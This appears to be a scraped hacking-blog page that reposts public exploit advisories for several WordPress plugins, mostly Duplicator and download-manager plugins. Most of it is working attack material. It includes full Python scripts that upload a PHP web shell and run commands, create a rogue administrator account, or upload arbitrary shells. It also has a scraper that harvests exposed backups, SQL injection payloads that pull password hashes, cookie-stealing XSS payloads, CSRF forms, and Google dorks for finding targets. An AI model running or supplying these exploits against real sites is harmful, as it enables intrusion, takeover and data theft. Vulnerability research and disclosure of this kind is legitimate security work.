# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.2.32
# CVE : CVE-2018-7543
# Category : webapps
Description
===========
Duplicator is a wordpress plugin with more than 1 million of active installations. Version 1.2.32 (and possibly previous versionss) are affected by a Reflected XSS vulnerability.
Vulnerable part of code
=======================
File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is tricked to click over a link or browse a URL under the attacker control.
Proof of Concept
============
In order to exploit this vulnerability, an attacker has to send the following request to the server:
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: <hostname>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''
The server replies as reported below:
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2018 14:15:28 GMT
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
Content-Length: 10224
Connection: close
Content-Type: text/html; charset=UTF-8
...
<script>
MyViewModel = function() {
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';
var errorCount = this.status.step2.query_errs || 0;
(errorCount >= 1 )
? $('#dup-step3-install-report-count').css('color', '#BE2323')
: $('#dup-step3-install-report-count').css('color', '#197713')
};
ko.applyBindings(new MyViewModel());
</script>
Solution
========
Update to version 1.2.33
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141608
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Every registered user can create and download backup files.
File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');
http://security.szurek.pl/duplicator-058-privilege-escalation.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then start scan:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan
After that you can build backup:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build
This function will return json with backup name inside File key.
You can download backup using:
http://wordpress-url/wp-snapshots/%file_name_from_json%
3. Solution:
Update to version 0.5.10
######################
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
# Date : 2015-04-08
# Tested on : Linux / Mozilla Firefox
######################
# Description
Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
Location file: /view/actions.php
This is the bugged ajax functions wp_ajax_duplicator_package_delete:
function duplicator_package_delete() {
DUP_Util::CheckPermissions('export');
try {
global $wpdb;
$json = array();
$post = stripslashes_deep($_POST);
$tblName = $wpdb->prefix . 'duplicator_packages';
$postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
$list = explode(",", $postIDs);
$delCount = 0;
if ($postIDs != null) {
foreach ($list as $id) {
$getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
if ($getResult) {
$row = $getResult[0];
$nameHash = "{$row['name']}_{$row['hash']}";
$delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
if ($delResult != 0) {
$post['duplicator_delid'] variable is not sanitized
A authorized user with "export" permission or a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin (CSRF)
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
######################
# Vulnerability Disclosure Timeline:
2015-04-08: Discovered vulnerability
2015-04-08: Vendor Notification
2015-04-09: Vendor Response/Feedback
2015-04-10: Vendor Send Fix/Patch
2015-04-10: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -
Unauthenticated Sensitive Data Exposure to Account Takeover
# Google Dork: inurl:("plugins/duplicator/")
# Date: 2023-12-04
# Exploit Author: Dmitrii Ignatyev
# Vendor Homepage:
https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.5.7.1
# Tested on: Wordpress 6.4
# CVE : CVE-2023-6114# CVE-Link :
https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A
severe vulnerability has been discovered in the directory
*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
exposes extensive information about the site, including its
configuration, directories, and files, but more critically, it
provides unauthorized access to sensitive data within the database and
all data inside. Exploiting this vulnerability poses an imminent
threat, leading to potential *brute force attacks on password hashes
and, subsequently, the compromise of the entire system*.*
POC*:
1) It is necessary that either the administrator or auto-backup works
automatically at the scheduled time
2) Exploit will send file search requests every 5 seconds
3) I attack the site with this vulnerability using an exploit
Exploit sends a request to the server every 5 seconds along the path
“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if
it finds something in the index of, it instantly parses all the data
and displays it on the screen
Exploit (python3):
import requests
from bs4 import BeautifulSoup
import re
import time
url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
processed_files = set()
def get_file_names(url):
response = requests.get(url)
if response.status_code == 200 and len(response.text) > 0:
soup = BeautifulSoup(response.text, 'html.parser')
links = soup.find_all('a')
file_names = []
for link in links:
file_name = link.get('href')
if file_name != "../" and not file_name.startswith("?"):
file_names.append(file_name)
return file_names
return []
def get_file_content(url, file_name):
file_url = url + file_name
if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
print(f"Ignoring file: {file_name}")
return None
file_response = requests.get(file_url)
if file_response.status_code == 200:
return file_response.text
return None
while True:
file_names = get_file_names(url)
if file_names:
print("File names on the page:")
for file_name in file_names:
if file_name not in processed_files:
print(file_name)
file_content = get_file_content(url, file_name)
if file_content is not None:
print("File content:")
print(file_content)
processed_files.add(file_name)
time.sleep(5)
--
With best regards,
Dmitrii Ignatyev, Penetration Tester
source: https://www.securityfocus.com/bid/61425/info
The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Duplicator 0.4.4 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)
# Date: 02/09/2021
# Exploit Author: Nikhil Kapoor
# Software Link: https://wordpress.org/plugins/duplicate-page/
# Version: 4.4.1
# Category: Web Application
# Tested on Windows
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Duplicate Page
3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><svg/onload=confirm(/XSS/)>
# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : N/A
# Notes:
# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications
# Application was patched by vendor within 24 hours of initial disclosure
# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed
# Any file types can be added to the "supported_type" parameter
# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php have "_.txt" appended to the end creating a text file
# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the POC can be easily modified to gain a reverse shell
#!/usr/bin/python
import string
import random
import requests
from bs4 import BeautifulSoup
import sys
payloadurl=""
def RecurseLinks(base,file):
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"}
f = requests.get(base, headers=headers)
soup = BeautifulSoup(f.content, "html.parser")
for root in soup.find_all("a"):
href = root.get("href")
if (href.startswith("/")):
do = "nothing"
elif (href.endswith("/")):
RecurseLinks(base + href, file)
else:
if file in href:
print ("\n[+] File Found --> " + base + href)
global payloadurl
payloadurl = (base+href)
def main():
#os.system('cls')
print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution")
print("@amartinsec --> Twitter\nCVE:2020-12800\n")
#Build The Request
#Generate random URL for filename
file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))
urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ")
#Finding the nonce used in the Ajax security string
print ("\n[+] Searching for security string nonce")
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
homepage = requests.get(urlinput,headers=headers)
homepage = homepage.text
homepage = homepage.split("ajax_nonce\":\"",1)[1]
securitykey = homepage[:10]
print("[+] Found security string --> " + securitykey)
url = urlinput + "/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601",
}
data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \
"php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \
"5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \
"dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \
"\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \
"\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \
"filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \
"<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \
"\r\n-----------------------------350278735926454076983690555601--\r\n"
print "\n[+] Sending payload to target"
response = requests.post(url, headers=headers, data=data)
if "200" in str(response):
print("[+] Looks like a successful file upload!\n")
elif "403" in str(response):
print("\nFile Upload Failed")
print("403 in response. Check security string")
sys.exit(1)
else:
print("File upload failed. Try the manual way with Burp")
sys.exit(1)
print("[+] Crawling for the uploaded file. This may take a minute...")
print("[+] Searching for " + file + ".php")
RecurseLinks(urlinput + "/wp-content/uploads/",file)
if payloadurl == "":
print("Can't find the file on the web server")
print("Try the manual method")
sys.exit(1)
#If all goes well, we can now send requests for RCE
print("[+] Success\n")
while True:
cmd= raw_input("[+] CMD: ")
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
request = requests.get(payloadurl + "?e=" + cmd, headers=headers)
print request.text
if __name__ == "__main__":
main()
# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
# Date 28.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
# Version: < 4.4.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24786
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md
'''
Description:
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
'''
# Banner:
banner = '''
___ __ ____ ___ ____ _ ____ _ _ _____ ___ __
/ __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_
/ / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \
/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |
\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/
[+] Download Monitor - SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', '+')
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
source: https://www.securityfocus.com/bid/55487/info
The Download Monitor plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Download Monitor 3.3.5.7 is vulnerable; other versions may also be affected.
GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1
# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
# Vendor Homepage: http://www.wpdownloadmanager.com
# Software Link: https://wordpress.org/plugins/download-manager
# Affected Versions: Free 2.7.94 & Pro 4
# Tested on: WordPress 4.2.2
# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
-- Description --
The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:
Example: <svg onload=alert(0)>.jpg
The vulnerability exists because the file name is not properly sanitized
and this can lead to malicious code injection that will be executed on the
target’s browser.
-- Proof of Concept --
1. The attacker creates a new download package via the plugin's menu
and uploads a file with the name: <svg onload=alert(0)>.jpg
2. The stored XSS can be triggered when an authenticated user (e.g. admin)
attempts to edit this download package
-- Solution --
Upgrade to the latest version
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--
In the pro features of the WordPress download manager plugin, there is
a Category Short-code feature witch can use to sort categories with
order by a function which will be used as ?orderby=title,publish_date
.
By adding parameter "> and add any XSS payload , the xss payload will execute.
To reproduce,
1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order </button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--
Another reflected cross-site scripting via advance search
https://server/wpdmpro/advanced-search/
https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03: Discovered vulnerability
# 2014-12-04: Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
# if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# echo "function not defined!";
# die();
# }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# ...
# ...
# ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
# (mixed) (required) An array of user data, stdClass or WP_User object.
# Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | ______ |__| __ __
|::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
`--- ---' |. | \| _ | | | | | | _ | _ | _ |
|. | |_____|________|__|__|__|_____|___._|_____|
|: 1 / ___ ___
|::.. . / | Y .---.-.-----.---.-.-----.-----.----.
`------' |. | _ | | _ | _ | -__| _|
|. \_/ |___._|__|__|___._|___ |_____|__|
|: | | |_____|
|::.|:. |
`--- ---'
Wordpress Download Manager
R3m0t3 C0d3 Ex3cut10n
(Add WP Admin)
v2.7.0-2.7.4
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
username = id_generator()
pwd = id_generator()
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
'execute' : 'wp_insert_user',
'user_login' : username,
'user_pass' : pwd,
'role' : 'administrator'})
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
print "[+] Tryng to connect to: "+host
try:
req = urllib2.Request(host+"/", body, headers)
response = urllib2.urlopen(req)
html = response.read()
if html == "":
print("[!] Account Added")
print("[!] Location: "+host+"/wp-login.php")
print("[!] Username: "+username)
print("[!] Password: "+pwd)
else:
print("[X] Exploitation Failed :(")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))
# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260
1. Description
Every registered user can update every WordPress options using basic_settings() function.
function basic_settings()
{
if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
foreach ($_POST as $optn => $optv) {
update_option($optn, $optv);
}
if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
die('Settings Saved Successfully');
}
include('settings/basic.php');
}
http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
<input type="hidden" name="task" value="wdm_save_settings">
<input type="hidden" name="section" value="basic">
<input type="hidden" name="default_role" value="administrator">
<input type="submit" value="Hack!">
</form>
After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.
3. Solution:
Update to version 2.7.3
# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
# Google Dork: inurl:"/wp-content/plugins/download-manager
# Date: 24 may, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://www.wpdownloadmanager.com/
# Software Link: https://wordpress.org/plugins/download-manager/
# Tested on: Apache/2.2.24 (CentOS)
POC
#1
There is no CSRF nonce check performed in "POST
/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request.
#Code
<form method="POST"
action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
<input type="hidden" name="__wpdm_email_template" value="default.html">
<input type="hidden" name="__wpdm_email_setting[logo]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[banner]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[footer_text]"
value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[youtube]"
value="https://malicious-url.com">
<input type="submit">
</form>
#2
There is no CSRF nonce check performed in "POST
/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
e&id=default" request.
#Code
<form method="POST"
action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
task=EditEmailTemplate&id=default">
<input type="hidden" name="id" value="default">
<input type="hidden" name="email_template[subject]" value="forget password">
<input type="hidden" name="email_template[message]" value="aaa">
<input type="hidden" name="email_template[from_name]" value="hacker">
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
<input type="submit">
</form>
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("Download From Files <= 1.48 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("Sikeres" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'download_from_files_617_fileupload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowExt" : "php4,phtml",
"filesName" : "files",
"maxSize" : "1000",
"uploadDir" : "."
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-admin/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_POST['id']` is not escaped.
`populate_download_edit_form()` is accessible for every registered user.
http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
2. Proof of Concept
Login as regular user.
<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 2.1.0
# Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Date: 30-10-2021
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://domaincheckplugin.com/
# Software Link: https://wordpress.org/plugins/domain-check/
# Version: 1.0.16
# Tested on: Linux
# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)
# Description:
